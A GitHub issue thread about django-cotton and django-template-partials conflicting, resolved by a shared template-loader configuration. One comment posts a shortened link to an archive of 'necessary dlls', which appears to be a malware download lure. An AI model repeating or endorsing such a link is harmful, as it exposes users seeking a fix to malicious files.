### ISSUE TITLE
Ability to use django-cotton alongside django-template-partials

### ISSUE THREAD

**Issue by hanerlend** [wrabit/django-cotton#153]
Whenever you install both django-template-partials and django-cotton, dango-cotton seizes to work.

To replicate.

Install both
pip install django-cotton
pip install django-template-partials

in setup.py, add only django_cotton:
```python
INSTALLED_APPS = [

    # Third parties
    # for templates
    "django_cotton",
```

Make a component:
_templates/cotton/icons/download.html:_
```html
<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 16 16" fill="currentColor" class="w-4 h-4">
    <path d="M8.75 2.75a.75.75 0 0 0-1.5 0v5.69L5.03 6.22a.75.75 0 0 0-1.06 1.06l3.5 3.5a.75.75 0 0 0 1.06 0l3.5-3.5a.75.75 0 0 0-1.06-1.06L8.75 8.44V2.75Z" />
    <path d="M3.5 9.75a.75.75 0 0 0-1.5 0v1.5A2.75 2.75 0 0 0 4.75 14h6.5A2.75 2.75 0 0 0 14 11.25v-1.5a.75.75 0 0 0-1.5 0v1.5c0 .69-.56 1.25-1.25 1.25h-6.5c-.69 0-1.25-.56-1.25-1.25v-1.5Z" />
</svg>
```

reference said component in index.html:
```html
<c-icons.download />
```

Start the server and open index.html.

edit setup.py:
in setup.py:
```python
INSTALLED_APPS = [

    # Third parties
    # for templates
    "django_cotton",
    "template_partials",
```

Open index.html again. The icon is gone.

**Comment by andreyfmc** [comment]
download
https://bit.ly/4gx42eQ
I put the necessary dlls in the archive

**Comment by copyfactory** [comment]
This is because both packages modify the template loaders at startup.

You need to use the 'django_cotton.apps.SimpleAppConfig' & template_partials SimpleAppConfig instead of 'django_cotton' in your installed apps.

Here is the template setup I use to have them work together:

settings.py
```
INSTALLED_APPS=[
    "django_cotton.SimpleAppConfig",
    "template_partials.apps.SimpleAppConfig",
]
```

templates:
```
TEMPLATES = [
    {
        "BACKEND": "django.template.backends.django.DjangoTemplates",
        "DIRS": [str(APPS_DIR / "templates")],
        "APP_DIRS": False,
        "OPTIONS": {
            "loaders": [
                (
                    "django_cotton.cotton_loader.Loader",
                    [
                        "django.template.loaders.cached.Loader",
                        "django.template.loaders.filesystem.Loader",
                        "django.template.loaders.app_directories.Loader",
                    ],
                ),
                (
                    "template_partials.loader.Loader",
                    [
                        (
                            "django.template.loaders.cached.Loader",
                            [
                                "django_cotton.cotton_loader.Loader",
                                "django.template.loaders.filesystem.Loader",
                                "django.template.loaders.app_directories.Loader",
                            ],
                        ),
                    ],
                ),
            ],
            "builtins": [
                "django_cotton.templatetags.cotton",
                "template_partials.templatetags.partials",
            ],
        },
    }
]

```

template_partials + cotton is productivity heaven.

**Comment by wrabit** [comment]
thanks @copyfactory ! 

@hanerlend, since a few people have asked (some solutions exists in issues, I just added a new [docs section](https://django-cotton.com/docs/django-template-partials) describing the setup.

@copyfactory's loader setup is slightly different, (splitting the loaders out) but I'm unaware of the differences between the 2 approaches.

**Comment by wrabit** [comment]
@hanerlend please reach back here if you have any more issues

**Comment by hanerlend** [comment]
Thanks @copyfactory for taking the time to detail your setup!

> template_partials + cotton is productivity heaven.

Looks like this is the way to go! 😊

Thanks @wrabit for filling out this answer, and adding a great explanation to the docs! 😊
